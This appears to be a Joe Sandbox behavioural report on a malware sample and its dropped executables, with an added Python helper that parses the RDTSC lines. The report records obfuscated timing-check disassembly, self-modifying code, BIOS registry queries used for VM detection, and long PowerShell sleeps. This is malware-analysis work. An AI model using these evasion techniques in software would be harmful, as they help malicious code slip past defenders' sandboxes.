Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0012 second address: 50B00B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10B70A6h 0x0000000f push eax 0x00000010 jmp 00007F5BC10B709Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5BC10B70A4h 0x0000001d sbb esi, 3D69CE88h 0x00000023 jmp 00007F5BC10B709Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F5BC10B70A8h 0x0000002f and si, 30E8h 0x00000034 jmp 00007F5BC10B709Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B00B5 second address: 50B00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, 4Bh 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B00C4 second address: 50B00C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B00C8 second address: 50B00DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B00DD second address: 50B00E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACD13C second address: ACD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACD142 second address: ACD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10B7096h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10B70A3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC2D1 second address: ACC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10A35F8h 0x0000000b pushad 0x0000000c js 00007F5BC10A35F6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10A35F6h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC2F2 second address: ACC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10B70ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC305 second address: ACC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC309 second address: ACC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC459 second address: ACC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC59C second address: ACC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10B709Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10B709Eh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACC729 second address: ACC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF0A7 second address: ACF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF0B1 second address: ACF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF0B5 second address: ACF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10B70AFh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10B70A7h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10B70A4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF0FD second address: ACF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF206 second address: ACF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF20B second address: ACF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10A35FBh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF269 second address: ACF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF26E second address: ACF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF3F0 second address: ACF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF3F4 second address: ACF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
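Each "RDTSC instruction interceptor" line above records one pair of consecutive RDTSC reads in a process and the instructions executed between the two reads; the addresses are where the first and second read sit. Runs of push/pop, pushad/popad, pushfd/popfd and jumps between the reads are the obfuscator's filler around the timing check, while anything else (mov, xchg, test, lea, the fs:[0] SEH frame setup) is the real code the check is wrapped around. The following is an added example for reading these lines, not Joe Sandbox code; the line format is inferred from the report and the three sample lines are copied from it.

```python
"""Summarise the 'RDTSC instruction interceptor' lines of a Joe Sandbox report.

Added example for reading this report; it is not Joe Sandbox code and the
line format is inferred from the lines printed above.  Each line records one
pair of consecutive RDTSC reads in a process and the instructions executed
between them.  Pairs separated only by push/pop, pushad/popad, pushfd/popfd,
nop and jumps are obfuscator filler around the read-after-read timing check;
anything else is the code the timing check is wrapped around.
"""
import re
from collections import defaultdict

# Mnemonics the obfuscator uses as filler between the two reads.  Any j* mnemonic
# (jmp and the conditional jumps seen in skotes.exe) is also treated as filler.
FILLER = {"rdtsc", "push", "pop", "pushad", "popad", "pushfd", "popfd", "nop"}

LINE_RE = re.compile(
    r"Source: (?P<src>\S+) RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.*)$"
)
# Every instruction is introduced by an 8-digit offset, e.g. "0x0000000e mov eax, ...".
# Operands contain spaces and commas, so split on the offset token, not on whitespace.
OFFSET_RE = re.compile(r"0x[0-9a-f]{8} ")

# Three lines copied from the report above (constructed test input for this example).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B23 second address: 5080B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B08A0 second address: 50B08D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F5BC10A3607h 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A3600h 0x0000001c rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: ACF0B5 second address: ACF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10B70AFh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10B70A7h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10B70A4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc",
]


def parse_line(line):
    """Return {src, first, second, insns} for one interceptor line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    parts = OFFSET_RE.split(m.group("body").strip())
    return {
        "src": m.group("src"),
        "first": int(m.group("first"), 16),
        "second": int(m.group("second"), 16),
        "insns": [p.strip() for p in parts if p.strip()],
    }


def is_filler(insn):
    """True for the stack-juggling and jump filler the obfuscator emits."""
    mnemonic = insn.split()[0]
    return mnemonic in FILLER or mnemonic.startswith("j")


def real_instructions(insns):
    """The instructions between the two reads that are not obfuscator filler."""
    return [i for i in insns if not is_filler(i)]


def summarise(lines):
    """Per source binary: number of RDTSC pairs, how many were pure filler,
    the longest byte span between two reads, and the non-filler instructions."""
    out = defaultdict(lambda: {"pairs": 0, "filler_only": 0, "max_span": 0, "real": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:          # other signature lines (self-modifying code, ...) are skipped
            continue
        s = out[rec["src"]]
        s["pairs"] += 1
        s["max_span"] = max(s["max_span"], rec["second"] - rec["first"])
        real = real_instructions(rec["insns"])
        if real:
            s["real"].extend(real)
        else:
            s["filler_only"] += 1
    return dict(out)


if __name__ == "__main__":
    for src, s in summarise(SAMPLE_LINES).items():
        print(f"{src}: {s['pairs']} RDTSC pairs, {s['filler_only']} filler-only, "
              f"max span {s['max_span']} bytes")
        for insn in s["real"]:
            print("   ", insn)
```

Run over the whole report rather than the three samples, the per-binary counts show which dropped files carry the same RDTSC-wrapping obfuscator (DhqvS8pXj8.exe and skotes.exe here), and the non-filler list is the short path through the protected function that is worth reading in a disassembler.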
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Special instruction interceptor: First address: 32E763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Special instruction interceptor: First address: 56378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 94E763 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B8378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Special instruction interceptor: First address: 69DBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Special instruction interceptor: First address: 69DB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Special instruction interceptor: First address: 84CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Special instruction interceptor: First address: 875810 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 57E8E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 57C0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 754D9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 7AF4D5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Special instruction interceptor: First address: DCDBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Special instruction interceptor: First address: DCDB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Special instruction interceptor: First address: F7CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Special instruction interceptor: First address: FA5810 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: 4910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: 61D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: 5840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Memory allocated: 5060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Memory allocated: 5300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Memory allocated: 5100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Memory allocated: 54D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Memory allocated: 5660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Memory allocated: 7660000 memory reserve | memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Memory allocated: 32B0000 memory reserve | memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Memory allocated: 52B0000 memory reserve | memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Memory allocated: 6A60000 memory reserve | memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Memory allocated: 61D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Code function: 0_2_05100BE7 rdtsc 0_2_05100BE7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1101
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1066
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1130
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1113
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1111
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1133
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5621
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2610
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4019
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4144
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep count: 1101 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep time: -2203101s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108 Thread sleep count: 1066 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108 Thread sleep time: -2133066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092 Thread sleep count: 1130 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092 Thread sleep time: -2261130s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096 Thread sleep count: 1113 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096 Thread sleep time: -2227113s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064 Thread sleep count: 216 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064 Thread sleep time: -6480000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 Thread sleep count: 1111 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 Thread sleep time: -2223111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084 Thread sleep count: 1049 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084 Thread sleep time: -2099049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep count: 1133 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep time: -2267133s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 Thread sleep time: -922337203685477s >= -30000s
